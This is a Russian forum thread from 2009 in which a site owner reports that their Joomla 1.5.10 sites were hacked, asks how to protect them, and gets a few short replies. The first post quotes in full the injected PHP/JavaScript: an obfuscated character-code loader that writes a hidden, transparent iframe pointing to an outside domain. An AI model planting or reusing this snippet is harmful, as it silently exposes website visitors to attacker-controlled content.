Взломали сайты на Joomla 1.5.10

Тема в разделе "Вопросы безопасности", создана пользователем Vladlen, 05.05.2009.

  1. Offline

    Vladlen Недавно здесь

    Регистрация:
    17.10.2007
    Сообщения:
    64
    Симпатии:
    0
    Пол:
    Мужской
    Сегодня обнаружили, что во все наши сайты, которые расположены на одном сервере и работающие на Joomla 1.5.10 были взломаны....
    В конце файла index.php были прописаны вот такие строки:


    <?php echo '<script type="text/javascript">var gBhwGdGvEUgyLteZaNBv = "RvA60RvA105RvA102RvA114RvA97RvA109RvA101RvA32RvA119RvA105RvA100RvA116RvA104RvA61RvA34RvA52RvA56RvA48RvA34RvA32RvA104RvA101RvA105RvA103RvA104RvA116RvA61RvA34RvA54RvA48RvA34RvA32RvA115RvA114RvA99RvA61RvA34RvA104RvA116RvA116RvA112RvA58RvA47RvA47RvA112RvA114RvA111RvA102RvA105RvA116RvA111RvA111RvA108RvA116RvA105RvA112RvA46RvA98RvA105RvA122RvA47RvA98RvA108RvA111RvA103RvA47RvA102RvA101RvA101RvA100RvA46RvA104RvA116RvA109RvA108RvA34RvA32RvA115RvA116RvA121RvA108RvA101RvA61RvA34RvA98RvA111RvA114RvA100RvA101RvA114RvA58RvA48RvA112RvA120RvA59RvA32RvA112RvA111RvA115RvA105RvA116RvA105RvA111RvA110RvA58RvA114RvA101RvA108RvA97RvA116RvA105RvA118RvA101RvA59RvA32RvA116RvA111RvA112RvA58RvA48RvA112RvA120RvA59RvA32RvA108RvA101RvA102RvA116RvA58RvA45RvA53RvA48RvA48RvA112RvA120RvA59RvA32RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA58RvA48RvA59RvA32RvA102RvA105RvA108RvA116RvA101RvA114RvA58RvA112RvA114RvA111RvA103RvA105RvA100RvA58RvA68RvA88RvA73RvA109RvA97RvA103RvA101RvA84RvA114RvA97RvA110RvA115RvA102RvA111RvA114RvA109RvA46RvA77RvA105RvA99RvA114RvA111RvA115RvA111RvA102RvA116RvA46RvA65RvA108RvA112RvA104RvA97RvA40RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA61RvA48RvA41RvA59RvA32RvA45RvA109RvA111RvA122RvA45RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA58RvA48RvA34RvA62RvA60RvA47RvA105RvA102RvA114RvA97RvA109RvA101RvA62";var tFWwuHhNLrortVozzuuD = gBhwGdGvEUgyLteZaNBv.split("RvA");var OaCaUhzuuBpnGMjBTROe = "";for (var IDWCYKBYFvcTWeuqLukF=1; IDWCYKBYFvcTWeuqLukF<tFWwuHhNLrortVozzuuD.length; IDWCYKBYFvcTWeuqLukF++){OaCaUhzuuBpnGMjBTROe+=String.fromCharCode(tFWwuHhNLrortVozzuuD[IDWCYKBYFvcTWeuqLukF]);}document.write(OaCaUhzuuBpnGMjBTROe)</script>'; ?>


    Как можно защитить в дальнейшем сайты?
     
    Vladlen, 05.05.2009
    #1

  2. Наши спонсоры

     
  3. Offline

    _voland_ Местный => Cпециалист <=

    Регистрация:
    12.04.2008
    Сообщения:
    2 171
    Симпатии:
    102
    Пол:
    Мужской
    Поставить Ubuntu например если так не получается без вирусов жить
     
    _voland_, 05.05.2009
    #2
  4. macsim
    Offline

    macsim Недавно здесь

    Регистрация:
    15.02.2009
    Сообщения:
    2
    Симпатии:
    0
    А на какой ОС добавили код?
     
    macsim, 09.05.2009
    #3
  5. Offline

    Vladlen Недавно здесь

    Регистрация:
    17.10.2007
    Сообщения:
    64
    Симпатии:
    0
    Пол:
    Мужской
    на freebsd
     
    Vladlen, 09.05.2009
    #4
  6. OlegM
    Offline

    OlegM Russian Joomla! Team Команда форума

    Регистрация:
    12.04.2007
    Сообщения:
    4 310
    Симпатии:
    375
    Пол:
    Мужской
    Последнее редактирование: 31.03.2014
    OlegM, 09.05.2009
    #5
< Появилась надпись Посетите www.joom.ru - русский дом Joomla! | Joomla RE - ломают? >

Поделиться этой страницей

Загрузка...